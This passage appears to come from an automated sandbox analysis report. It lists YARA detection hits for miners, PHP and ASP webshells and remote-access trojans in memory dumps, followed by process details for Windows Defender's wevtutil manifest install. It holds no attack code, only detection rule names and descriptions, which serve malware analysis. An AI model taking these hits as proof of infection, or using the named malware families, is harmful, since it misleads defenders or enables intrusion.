                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: Oilrig_IntelSecurityManager, Description: Detects OilRig malware, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Eyal Sela
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Winexe_tool, Description: Yara detected Winexe tool, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 0%, Metadefender
                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:42:21
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\wevtutil.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man
                                                                                                                              Imagebase:0x7ff784010000
                                                                                                                              File size:291840 bytes
                                                                                                                              MD5 hash:C57C1292650B6384903FE6408D412CFA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:42:21
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff63a230000
                                                                                                                              File size:875008 bytes
                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:42:22
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\wevtutil.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
                                                                                                                              Imagebase:0x7ff784010000
                                                                                                                              File size:291840 bytes
                                                                                                                              MD5 hash:C57C1292650B6384903FE6408D412CFA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:42:22
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff63a230000
                                                                                                                              File size:875008 bytes
                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              Disassembly

                                                                                                                              Code Analysis
